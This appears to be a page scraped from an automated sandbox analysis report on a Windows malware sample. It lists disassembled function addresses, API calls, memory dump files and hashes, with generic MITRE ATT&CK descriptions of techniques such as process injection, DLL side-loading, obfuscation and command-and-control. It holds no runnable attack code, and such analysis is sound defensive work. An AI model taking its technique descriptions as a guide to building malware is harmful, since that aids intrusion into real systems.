Function 000FA082 Relevance: 5.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0CB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0E8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA100

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 97343b7d66e229719a47a5c9b2d0d5a62058fc6e339f68e30372a426631c3071
Instruction ID: 5caeeb433c98dfae48ef1e84bba3f5f837b5f50f848fc8714aa392e2383cd39f
Opcode Fuzzy Hash: 97343b7d66e229719a47a5c9b2d0d5a62058fc6e339f68e30372a426631c3071
Instruction Fuzzy Hash: C1116536614A16EFD7148F15E8487A9B7B5FF44329F10802AE44183A61CB78BCA5CFD5

Function 000F5C63 Relevance: 5.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000E1857), ref: 000F5C78
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CAD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CDB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c3d452304ffa975dda2c81f57e6894ecdf28607b680c0cacc8781c2fb2b1ff70
Instruction ID: 05c49cc424cde4eec5321fa5efabec7c4c225790ddb648bae6b4438612ca275d
Opcode Fuzzy Hash: c3d452304ffa975dda2c81f57e6894ecdf28607b680c0cacc8781c2fb2b1ff70
Instruction Fuzzy Hash: C901B376A0492AEFCB085F55ED44458FBB2FB88361310C13BE51593A60CB7468A18FD5

Function 0010C7A7 Relevance: 5.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7B9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7D6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7EF

Part of subcall function 0010C6E0: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,74F80130,?,0010C800,00000000), ref: 0010C6F4

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C816

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: freemalloc$AcquireContextCrypt
String ID:
API String ID: 669775102-0
Opcode ID: a14fbaaa2718d72c47a65db8c17c4ec1c5d54fcf03c356d9a77a2f4b418039dd
Instruction ID: 0cb52ea97b53928f975746ac637371e093829812348d0f14ada803b4c1cd82e7
Opcode Fuzzy Hash: a14fbaaa2718d72c47a65db8c17c4ec1c5d54fcf03c356d9a77a2f4b418039dd
Instruction Fuzzy Hash: 3E01AD36714427DBCB185B24FC0451A3BA6EBC47A1B21C03BE885D36E0DFA05C428FE5

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

\Device\ConDrv

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: cmd.exePID: 4400, Parent PID: 5472

General

Function 00103EA4 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 494
encryptionfileCOMMON

Function 000DD33A Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 129
libraryloaderCOMMON

Function 0010699F Relevance: 24.2, APIs: 16, Instructions: 160
networkCOMMON

Function 00104585 Relevance: 37.2, APIs: 7, Strings: 14, Instructions: 415
libraryloaderCOMMON

Function 000F2F70 Relevance: 35.0, APIs: 8, Strings: 15, Instructions: 460
COMMON

Function 000C1FDC Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 198
filestringCOMMON

Function 00105AA0 Relevance: 31.9, APIs: 2, Strings: 16, Instructions: 411
COMMON

Function 000CDC15 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 418
fileCOMMON

Function 000C2230 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 155
fileCOMMON

Function 000CA06F Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 144
fileCOMMON

Function 00104B3E Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 395
COMMON

Function 000EFD8C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 343
COMMON

Function 000D760D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 252
networkCOMMON

Function 000DEE55 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 243
COMMON